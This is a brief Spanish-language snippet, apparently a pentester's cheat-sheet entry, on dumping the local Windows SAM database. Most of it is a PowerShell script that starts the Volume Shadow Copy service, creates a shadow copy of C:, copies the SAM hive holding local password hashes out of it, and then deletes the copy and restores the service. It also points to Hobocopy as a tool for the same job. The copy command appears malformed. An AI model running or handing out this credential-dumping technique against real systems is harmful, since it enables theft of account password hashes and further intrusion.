Volcado de SAM local en Windows:
Powershell:
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\`
$volume.Delete();if($notrunning -eq 1){$service.Stop()}
Herramientas exe:
Hobocopy https://candera.github.io/hobocopy/ (fuentes: https://github.com/candera/hobocopy )